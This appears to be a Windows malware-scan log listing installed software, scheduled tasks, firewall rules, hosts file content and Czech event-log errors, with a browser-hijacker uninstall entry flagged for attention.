HP Camera Driver (HKLM-x32\...\Sunplus SPUVCb) (Version: 3.4.8.48 - SunplusIT)
HP Client Security Manager (HKLM\...\HPProtectTools) (Version: 8.3.7.1864 - Hewlett-Packard Company)
HP Connection Manager (HKLM-x32\...\{C0ED9561-8312-457C-BB1B-BDC7EE034CED}) (Version: 4.7.4.1 - Hewlett-Packard Company)
HP Device Access Manager (HKLM\...\{DBE16A07-DDFF-4453-807A-212EF93916E0}) (Version: 8.3.2.0 - Hewlett-Packard Company)
HP Documentation (HKLM-x32\...\{AD7280A3-19D9-4D3F-B5EC-2D0DD0443698}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Drive Encryption (HKLM\...\HPDriveEncryption) (Version: 8.6.13.12 - Hewlett-Packard Company)
HP ESU for Microsoft Windows 7 (HKLM-x32\...\{56C60843-5199-47F1-9087-AE440EFFB951}) (Version: 2.5.1 - Hewlett-Packard Company)
HP File Sanitizer (HKLM-x32\...\{6349342F-9CEF-4A70-995A-2CF3704C2603}) (Version: 8.4.20.1 - Hewlett-Packard Company)
HP Hotkey Support (HKLM-x32\...\{445CC807-9384-47FA-A2B6-FFE970352B88}) (Version: 6.0.22.1 - Hewlett-Packard Company)
HP PageLift (HKLM-x32\...\{59202086-BEA1-411A-8AA4-A5DCD28FF537}) (Version: 1.0.13.1 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{438363A8-F486-4C37-834C-4955773CB3D3}) (Version: 9.1.15453.4066 - Hewlett-Packard Company)
HP SoftPaq Download Manager (HKLM-x32\...\{34FF930E-DBF9-4858-BAB5-BAC957BF616E}) (Version: 3.5.1.0 - Hewlett-Packard Company)
HP Software Setup (HKLM-x32\...\{F6D61EC9-347B-4019-9F8E-E24169F7C330}) (Version: 8.7.5 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{904822F1-6C7D-4B91-B936-6A1C0810544C}) (Version: 7.7.34.34 - Hewlett-Packard Company)
HP Support Information (HKLM-x32\...\{B2B7B1C8-7C8B-476C-BE2C-049731C55992}) (Version: 13.00.0000 - Hewlett-Packard)
HP System Default Settings (HKLM-x32\...\{B5BEF5F8-BD76-4174-A47D-05A06EA62615}) (Version: 2.7.1 - Hewlett-Packard Company)
HP Theft Recovery (HKLM-x32\...\InstallShield_{B1E569B6-A5EB-4C97-9F93-9ED2AA99AF0E}) (Version: 8.3.0.7 - Hewlett-Packard Company)
initialpage123 - Uninstall (HKLM-x32\...\{234AC151-AFED-40DC-BA3E-22E7414440F1}) (Version: - ) <==== ATTENTION
Intel(R) Chipset Device Software (x32 Version: 10.0.22 - Intel(R) Corporation) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.30.1072 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.15.4268 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.2.0.1016 - Intel Corporation)
Intel(R) Smart Connect Technology (HKLM\...\{CAB8255F-E9B7-4EFC-9C9B-2D3A4C954294}) (Version: 5.0.10.2861 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.1.41 - Intel Corporation)
Intel(R) WiDi (HKLM\...\{2F97FBC6-7992-4DF7-A7C7-B68455E307F7}) (Version: 5.1.20.0 - Intel Corporation)
Intel(R) Wireless Bluetooth(R)(patch version 17.1.1434.2) (HKLM\...\{302600C1-6BDF-4FD1-1407-148929CC1385}) (Version: 17.1.1407.0480 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{e63d3cb3-0b4d-44ca-aba0-ba433f2f37fd}) (Version: 17.13.0 - Intel Corporation)
IrfanView 4.44 (64-bit) (HKLM\...\IrfanView64) (Version: 4.44 - Irfan Skiljan)
Java 8 Update 121 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Last.fm Scrobbler 2.1.37 (HKLM-x32\...\LastFM_is1) (Version: - Last.fm)
LibreOffice 5.3.2.2 (HKLM\...\{682C33C0-5D61-48F0-B0A2-1A504F4C5905}) (Version: 5.3.2.2 - The Document Foundation)
Malwarebytes verze 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Microsoft .NET Framework 4.6.1 (čeština) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1029) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office 2016 pro profesionály - cs-cz (HKLM\...\ProfessionalRetail - cs-cz) (Version: 16.0.7870.2031 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Mozilla Firefox 52.0.2 (x86 cs) (HKLM-x32\...\Mozilla Firefox 52.0.2 (x86 cs)) (Version: 52.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0.2 - Mozilla)
MPC-HC 1.7.11 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.11 - MPC-HC Team)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.3.3 - Notepad++ Team)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7830.1018 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
OpenOffice 4.1.3 (HKLM-x32\...\{7308600A-5231-459C-A3E2-A637F842CACA}) (Version: 4.13.9783 - Apache Software Foundation)
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
OpenVPN 2.4.0-I601 (HKLM\...\OpenVPN) (Version: 2.4.0-I601 - OpenVPN Technologies, Inc.)
R for Windows 3.3.3 (HKLM\...\R for Windows 3.3.3_is1) (Version: 3.3.3 - R Core Team)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.273.49 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.83.328.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7383 - Realtek Semiconductor Corp.)
RStudio (HKLM-x32\...\RStudio) (Version: 1.0.136 - RStudio)
SHARP MX/MX-M Series PCL/PS Printer Driver (HKLM-x32\...\SHARP MX-2310U PCL PS Printer Driver) (Version: 1.00.000 - SHARP)
Skype™ 7.34 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.34.103 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-3530450637-73980329-3277372514-2116\...\Spotify) (Version: 1.0.52.725.g943b26a8 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.37.3 - Synaptics Incorporated)
TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - )
Validity Fingerprint Sensor Driver (HKLM\...\{ADAA7361-54B8-4FC8-804E-94EC6C11ED68}) (Version: 4.5.133.0 - Validity Sensors, Inc.)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
XnView 2.39 (HKLM-x32\...\XnView_is1) (Version: 2.39 - Gougelet Pierre-e)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {04BA5C12-BAF4-4EBD-A8EF-F82DBD5F545F} - System32\Tasks\HPCeeScheduleForTesla => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {1B456DEE-D774-4AF9-99D3-BB58176C79D6} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-03-03] (Piriform Ltd)
Task: {1EA529FC-F4AC-40CF-AAAA-44CE2D029937} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-09] (Google Inc.)
Task: {206701A0-AE04-4CF3-9C30-05245EFAC6DD} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {298035C0-1B4E-42EE-B39F-9BFC54AF00BB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-09] (Google Inc.)
Task: {3E9755F7-4ED6-4AE2-92BA-3C93953815F8} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-26] (Microsoft Corporation)
Task: {412A5668-020A-4A96-864C-B1EAD4DF5506} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2017-04-05] (COMODO)
Task: {49947075-E002-47CD-86BC-876EF7EE9462} - System32\Tasks\COMODO\COMODO Scan {F140D794-60B6-4F00-9235-D6457AA25B22} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2017-04-05] (COMODO)
Task: {4E430254-74CA-4CBF-BBA2-802F494562F2} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2017-03-24] (HP Inc.)
Task: {5A08501B-4BB0-4536-8B76-EE21CFC00C17} - System32\Tasks\Rqutyaninit Agent => C:\Program Files (x86)\Dermupy\xrehege.exe [2017-04-08] (Glarysoft Ltd)
Task: {66D7A763-CBC8-45D2-861F-06D6ADB1023C} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2017-04-05] (COMODO)
Task: {6E227349-115E-4840-BEB6-F87CA916C746} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-26] (Microsoft Corporation)
Task: {73B297B2-38C6-4D86-BF1B-55C2B7A47EDD} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2017-04-05] (COMODO)
Task: {9783580B-CC8C-41E9-A1AF-A722FCA417C1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-08-22] (Hewlett-Packard Company)
Task: {97D99300-99B3-4BB5-A195-A8FA15DCF8F3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {C18F6609-E0A7-477A-A19E-0009771073B4} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2017-04-08] (Dropbox, Inc.)
Task: {DE0D7CA5-319E-4E5E-9C2C-3EC89140DC4B} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2017-04-08] (Dropbox, Inc.)
Task: {E4EA4D7B-5C4B-4ECC-A80A-173712BC72F6} - System32\Tasks\COMODO\COMODO CMC {06A09C0F-DD9C-4191-A670-71115CD78627} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2017-04-05] (COMODO)
Task: {EC3E2758-4E4F-4418-AB35-9444272B33AE} - System32\Tasks\Registration => C:\Program Files (x86)\Hewlett-Packard\HP Setup\Dependencies\RemEngine.exe [2012-03-21] ()
Task: {F1EB4BF2-716A-4EE9-A57E-E087895844FC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-08-22] (Hewlett-Packard Company)
Task: {F9AA78BE-6850-42D5-BA29-37D6F4B6E3C5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFReport.exe [2016-02-18] (Hewlett-Packard)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForTesla.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\Tesla\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2"
ShortcutWithArgument: C:\Users\Tesla\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\Users\Tesla\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData

==================== Loaded Modules (Whitelisted) ==============

2016-12-28 01:16 - 2017-04-05 07:57 - 00107200 _____ () C:\Program Files\COMODO\COMODO Internet Security\cavwpps.dll
2016-12-28 01:16 - 2017-04-05 07:57 - 00244928 _____ () C:\Program Files\COMODO\COMODO Internet Security\cmdcomps.dll
2014-05-28 18:14 - 2014-05-28 18:14 - 00336056 _____ () c:\Program Files\Hewlett-Packard\Pre-Boot Security for HP ProtectTools\BIOSDomainPlugin.dll
2014-03-31 22:28 - 2014-03-31 22:28 - 00007168 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Theft Recovery\CtService.exe
2014-08-14 18:28 - 2014-08-14 18:28 - 00209712 _____ () c:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe
2014-08-14 18:28 - 2014-08-14 18:28 - 00057648 _____ () c:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\NetworkHeuristic.dll
2014-08-14 18:28 - 2014-08-14 18:28 - 00037168 _____ () c:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\ISCTNetMon.dll
2014-08-14 18:28 - 2014-08-14 18:28 - 00057648 _____ () c:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\ISCTEncryptionCheck.dll
2014-02-05 20:56 - 2014-02-05 20:56 - 02654936 _____ () C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\ShredContextMenu.dll
2017-03-08 04:42 - 2017-03-08 04:42 - 00230064 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2014-10-28 12:49 - 2015-09-15 22:56 - 00405416 _____ () C:\Windows\system32\igfxTray.exe
2016-03-16 11:25 - 2016-03-16 11:25 - 00073912 _____ () C:\Program Files\COMODO\COMODO Internet Security\scanners\smart.cav
2014-10-10 18:37 - 2014-10-10 18:37 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2017-02-02 16:37 - 00000850 ____A C:\Windows\system32\Drivers\etc\hosts

192.168.1.1 evi.ceda.cz

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3530450637-73980329-3277372514-2116\Control Panel\Desktop\\Wallpaper -> C:\Users\Tesla\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 213.46.172.36 - 213.46.172.37
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{46CA5EBA-DA2B-4090-A589-88BB5AA5DCCC}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{5A44D144-43F1-4F46-89CE-1D768A3EF32E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{EBC32DEF-5E1D-468B-8ED8-269B4CDD42DC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{82FA12B5-5478-4951-B377-54110ABDECA3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{54B704A2-2400-48C8-A221-4AACF32D1AC0}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{3CBCF809-AAF9-4F6D-8F9B-DD206AEA2A3D}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{BC3BD4F7-394A-46BB-877E-61E3BC3DDBE1}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{8C3849D0-AFC9-48E8-8377-4BECB9C97A06}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{D8447F41-1819-4DB7-95B3-1E2263285B1D}] => (Allow) C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe
FirewallRules: [{69E93BAE-AF2E-4D90-9A78-488F941C442F}] => (Allow) C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe
FirewallRules: [{CCC78DAC-CFCD-4ACC-8E56-2EAF3339F948}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [TCP Query User{93CDD671-DA31-4E6A-AEED-9C529CF920A0}C:\program files\openvpn\bin\openvpn.exe] => (Allow) C:\program files\openvpn\bin\openvpn.exe
FirewallRules: [UDP Query User{B6F23E0D-DFD0-4450-BC1F-3215C28B559E}C:\program files\openvpn\bin\openvpn.exe] => (Allow) C:\program files\openvpn\bin\openvpn.exe
FirewallRules: [TCP Query User{F59FA78B-BE6E-47C5-BFF1-C6C4500450DE}C:\program files\openvpn\bin\openvpn.exe] => (Allow) C:\program files\openvpn\bin\openvpn.exe
FirewallRules: [UDP Query User{74B80A01-C561-4903-B419-DADAC20AF146}C:\program files\openvpn\bin\openvpn.exe] => (Allow) C:\program files\openvpn\bin\openvpn.exe
FirewallRules: [TCP Query User{DB7A4B20-8023-4368-9EB8-AFE393F66743}C:\users\tesla\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\tesla\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{7C00FB1B-D86A-473D-B40A-B2675E8DE8A9}C:\users\tesla\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\tesla\appdata\roaming\spotify\spotify.exe
FirewallRules: [{B7B97855-2BDD-41C3-B09B-175D9878DCFE}] => (Block) C:\users\tesla\appdata\roaming\spotify\spotify.exe
FirewallRules: [{0CB41088-2E09-4761-BC35-630116776D1B}] => (Block) C:\users\tesla\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{908F4F28-2DEF-491F-AED7-D46E48D16863}C:\users\tesla\data\blizzard\hearthstone\hearthstone.exe] => (Allow) C:\users\tesla\data\blizzard\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{4AF58F00-F84A-4EA1-9168-5D219048B773}C:\users\tesla\data\blizzard\hearthstone\hearthstone.exe] => (Allow) C:\users\tesla\data\blizzard\hearthstone\hearthstone.exe
FirewallRules: [{C2190BD4-4CB4-4732-A16B-996922ACE712}] => (Block) C:\users\tesla\data\blizzard\hearthstone\hearthstone.exe
FirewallRules: [{9F9B37D3-661D-4E23-8A59-D8DF20B18C0C}] => (Block) C:\users\tesla\data\blizzard\hearthstone\hearthstone.exe
FirewallRules: [{429734EA-51CB-45ED-AA77-3D041F089374}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{8DB0FB09-045C-4B8A-8A51-3D12E94268A1}] => (Allow) C:\Users\Tesla\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{86EE8CC6-E479-43F9-9292-99880301813D}] => (Allow) C:\Users\Tesla\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{FD7B850A-7918-4E95-B82D-3CFE8AA78A5D}] => (Allow) C:\Users\Tesla\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{C167E950-A8DB-4209-8519-5FCF6A1D6097}] => (Allow) C:\Users\Tesla\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{B5CA96D6-609F-4E33-BD6D-84E22002E54C}] => (Allow) C:\Users\Tesla\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{1395CCE0-3940-4D81-98BF-F823AEE32B1D}] => (Allow) C:\Users\Tesla\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{758D18CE-4984-4537-B722-F134F023F135}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{691D7F8D-CD47-4D2A-9714-622C863D2EA3}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{876A00E7-4EFC-400C-ACC8-10CA0B4FEAA5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{6DBCF585-3F61-4970-A93F-F94FB2A7AAD9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{5FF3552D-A546-45A3-9292-7936BBEC1DDD}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{6FB2BB2C-DC6F-4D28-8D17-75019778EC57}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{8A5C1618-CA5F-4077-8440-5090CB845B87}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe

==================== Restore Points =========================

09-04-2017 11:48:38 Windows Update

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (04/10/2017 07:27:10 PM) (Source: flcdlock) (EventID: 1067) (User: )
Description: Při získávání nastavení přístupu místního počítače došlo k chybě.


Kód systémové chyby je 0x54b:-

Zadaná doména neexistuje nebo není k dispozici.

Error: (04/10/2017 01:08:34 PM) (Source: flcdlock) (EventID: 1067) (User: )
Description: Při získávání nastavení přístupu místního počítače došlo k chybě.


Kód systémové chyby je 0x54b:-

Zadaná doména neexistuje nebo není k dispozici.

Error: (04/10/2017 12:58:34 PM) (Source: flcdlock) (EventID: 1067) (User: )
Description: Při získávání nastavení přístupu místního počítače došlo k chybě.


Kód systémové chyby je 0x54b:-

Zadaná doména neexistuje nebo není k dispozici.

Error: (04/10/2017 08:08:56 AM) (Source: SideBySide) (EventID: 63) (User: )
Description: Generování kontextu aktivace pro c:\program files\r\r-3.3.3\tcl\bin64\tk85.dll se nezdařilo. Chyba v souboru manifestu nebo zásady c:\program files\r\r-3.3.3\tcl\bin64\tk85.dll na řádku 9.
Hodnota x64 atributu processorArchitecture v prvku assemblyIdentity je neplatná.

Error: (04/10/2017 08:02:31 AM) (Source: flcdlock) (EventID: 1069) (User: )
Description: Aktuální operace profilu SID selhala s neznámou výjimkou.

Error: (04/10/2017 08:02:28 AM) (Source: openvpnserv) (EventID: 0) (User: )
Description: Event-ID 0

Error: (04/09/2017 11:05:41 PM) (Source: flcdlock) (EventID: 1067) (User: )
Description: Při získávání nastavení přístupu místního počítače došlo k chybě.


Kód systémové chyby je 0x54b:-

Zadaná doména neexistuje nebo není k dispozici.

Error: (04/09/2017 11:05:40 PM) (Source: openvpnserv) (EventID: 0) (User: )
Description: Event-ID 0

Error: (04/09/2017 11:02:38 PM) (Source: flcdlock) (EventID: 1067) (User: )
Description: Při získávání nastavení přístupu místního počítače došlo k chybě.


Kód systémové chyby je 0x54b:-

Zadaná doména neexistuje nebo není k dispozici.

Error: (04/09/2017 11:01:38 PM) (Source: flcdlock) (EventID: 1067) (User: )
Description: Při získávání nastavení přístupu místního počítače došlo k chybě.


Kód systémové chyby je 0x54b:-

Zadaná doména neexistuje nebo není k dispozici.


System errors:
=============
Error: (04/10/2017 07:27:43 PM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: CEDA)
Description: Zpracování zásad skupiny selhalo v důsledku toho, že se nebylo v síti možné připojit k řadiči domény. Může se jednat o přechodný stav. Po připojení počítače k řadiči domény a úspěšném zpracování zásad skupiny bude odeslána zpráva o úspěšné provedení těchto akcí. Pokud se tato zpráva nezobrazí během několika hodin, obraťte se na správce.

Error: (04/10/2017 07:27:42 PM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: Tento počítač nemohl nastavit zabezpečenou relaci s řadičem
domény v doméně CEDA z následujícího důvodu:
Pro vyřízení žádosti o přihlášení nejsou nyní k dispozici žádné přihlašovací servery.


To může vést k potížím při ověřování. Přesvědčte se, zda je tento
počítač připojen k síti. Pokud potíže trvají,
obraťte se na správce domény.



DALŠÍ INFORMACE

